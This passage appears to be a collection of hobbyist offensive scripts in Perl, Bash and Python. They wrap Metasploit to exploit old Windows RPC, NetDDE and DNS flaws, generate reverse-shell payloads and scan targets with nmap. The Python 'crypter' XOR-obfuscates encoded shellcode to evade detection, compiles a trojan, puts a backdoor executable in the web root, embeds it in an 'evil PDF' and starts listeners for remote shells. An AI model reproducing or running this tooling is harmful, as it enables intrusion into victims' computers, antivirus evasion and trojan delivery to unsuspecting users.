print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub netdde

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-04-031 on them and gives you a Meterpreter shell \n”;

print ” moar old vulns… Patch plz lol \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms04_031_netdde RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub zonename

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-07-029 on them and gives you a Meterpreter shell \n”;

print ” No idea how this one works bro \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/dcerpc/ms07_029_msdns_zonename RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub exit

{

exit

}

#!/bin/bash

function pause(){

   read -p “$*”

}

function listner () {

echo -n “Enter Payload: “

read pay

echo -n “Enter LHOST: “

read lh

echo -n “Enter LPORT: “

read lp

    echo -n “Create Payload (y/n)? “

read t1

if [ “$t1” = “y” ]; then {

    echo -n “Filename (*.exe): “

    read fil

    msfpayload $pay LHOST=$lh LPORT=$lp X > $fil

    }

else

msfcli exploit/multi/handler PAYLOAD=$pay LHOST=$lh LPORT=$lp E

fi

}

function nmp () {

echo -n “NMAP IP Address Scanner”

echo

echo “IP Address: “

read ip

echo

echo “First we are going to do a ping scan.”

sleep 2

nmap -sP $ip

pause ‘Press any key to continue…’

echo

echo “Next we are going to scan for the Operating System the slave is running on.”

sleep 2

nmap $ip -O

pause ‘Press any key to continue…’

echo

echo “Next we detect open ports on the target.”

sleep 2

nmap -sS $ip

echo

pause ‘Press any key to continue…’

clear

}

echo ”           Menu List”

echo ”          —————-“

echo “Motioncity13’s Option Menu (First Bash Code)” 

echo

echo “1) Metasploit Payload Generator and Listener”

echo “2) NMAP Scanner”

echo “3) Quit”

echo

while [ 1 ]

do

read op

case “$op” in

  “1” )

  #Call Metasploit Function

  listner 

  ;;

  “2” )

  #Call NMP Function

  nmp

  ;;

  “3” )

  echo

  exit 0

  ;;

* )

   echo

   echo “Wrong selection.”

  ;;

esac

done

#echo

#exit 0

#!/usr/bin/python

#coding: utf-8

from struct import *

import os

import commands

import subprocess

import random 

os.system(“clear”)

os.chdir(“/opt/metasploit/msf3”)

print “**************************************”

print ”       __      __   __    ___    __”

print ”      / /     / /  /  \  / _ \  / /”

print ”     / /     / /__/ /\ \/ / \ \/ / “

print ”    / /     / ___  /  \  /   \  /  ”

print ”   / /_____/ /  / /   / /   / /\ \ “

print ”  /_________/  /_/   /_/   /_/  \_\”

print “”

print “**************************************”

print ”          Crypter for metasploit    ”

print “**************************************”

host = raw_input(“lhost (e for external ip) ?”).strip()

if host == ‘e’:

os.system(“curl ifconfig.me » ip.txt”)

lhost = commands.getoutput(‘cat ip.txt’)

os.system(“rm ip.txt”)

os.system(“clear”)

print “[*] lhost: “, lhost

else:

lhost = host

print “[*] lhost: “, lhost

lport = raw_input(“lport ?”).strip()

print “[*] lport: “, lport

print “**************************************”

print “1) windows/shell_reverse_tcp”

print “2) windows/shell/reverse_tcp”

print “3) windows/shell/reverse_tcp_dns”

print “4) windows/shell/reverse_http”

print “5) windows/meterpreter/reverse_tcp”

print “6) windows/meterpreter/reverse_tcp_dns”

print “7) windows/meterpreter/reverse_http”

print “**************************************”

payload = raw_input(“Select a payload (1-8):”).strip()

payload_raw = “temp.raw”

out = “temp.c”

structure = “structure.c”

key = random.randint(0,255)

print “[*] Generating random junk…”

print “[*] Randomizing file size…”

randomSize = random.randint(20480,25600)

junkA = “”

junkB = “” 

junkA += “"”

for i in xrange(1,randomSize):

junkA += chr(random.randint(65,90)) 

junkA +=  ”"”

junkB += “"”

for i in xrange(0,randomSize):

junkB += chr(random.randint(65,90)) 

junkB +=  ”"”

print “[*] Generating metasploit shellcode…”

if payload == “1”:

os.system(“./msfpayload windows/shell_reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “2”:

os.system(“./msfpayload windows/shell/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “3”:

os.system(“./msfpayload windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “4”:

os.system(“./msfpayload windows/shell/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “5”:

os.system(“./msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “6”:

os.system(“./msfpayload windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “7”:

os.system(“./msfpayload windows/meterpreter/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

a = open(payload_raw,”rb”)

b = open(out,”w”)

payload_raw = a.read()

tempArray = []

outArray = []

x = 0

print “[*] Encoding with XOR key: “, hex(key) 

print “[*] Obfuscating shellcode…”

length = int(len(payload_raw)*2)

for i in xrange(0,length):

if i % 2 == 0:

tempArray.append(unpack(“B”,payload_raw[x])[0]^key)

x += 1

else:

randomByte = random.randint(65,90)

tempArray.append(randomByte)

for i in range(0,len(tempArray)):

tempArray[i]=”\x%x”%tempArray[i]

for i in range(0,len(tempArray),15):

outArray.append(‘\n”’+”“.join(tempArray[i:i+15])+”"”)

outArray = “”.join(outArray)

devide = “i % 2;”

open_structure = open(structure).read()

code = open_structure % (junkA,outArray,junkB,key,length,devide)

b.write(code)

b.flush()

print “[*] Compiling trojan horse…”

os.system(“i586-mingw32msvc-gcc -mwindows temp.c”)

print “[*] Stripping out the debugging symbols…”

os.system(“strip —strip-debug a.exe”)

print “[*] Moving trojan horse to web root…”

os.system(“mv a.exe /var/www/backdoor.exe”)

print “**************************************”

print “1) apache server”

print “2) java applet attack”

print “3) create evil PDF”

print “**************************************”

attack = raw_input(“Select an attack (1-n):”).strip()

if attack == “1”:

print “[*] Starting apache…”

os.system(‘sh -c “service apache2 start; sleep 4”’)

if attack == “2”:

subprocess.Popen(args=[“gnome-terminal”, “—command=sh javaAttack.sh”]).pid

if attack == “3”:

original = raw_input(“path to original pdf: “).strip()

print “[*] Creating evil PDF…”

os.system(“./msfcli windows/fileformat/adobe_pdf_embedded_exe EXE::Custom=/var/www/backdoor.exe FILENAME=backdoor.pdf INFILENAME=%s E” % (original))

os.system(“mv /root/.msf4/local/backdoor.pdf /var/www”)

print “[*] moving backdoor.pdf to webroot”

print “[*] lhost: “, lhost

print “[*] lport: “, lport

if payload == “1”:

print “[*] Starting the netcat listener…”

os.system(“nc -lvp %s” % (lport))

elif payload == “2”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “3”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “4”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_http LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “5”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “6”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “7”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_http LHOST=%s LPORT=%s E” % (lhost, lport))

print “[*] Cleaning up…”

os.system(“rm temp.c”)

os.system(“rm temp.raw”)

print “[*] Done !”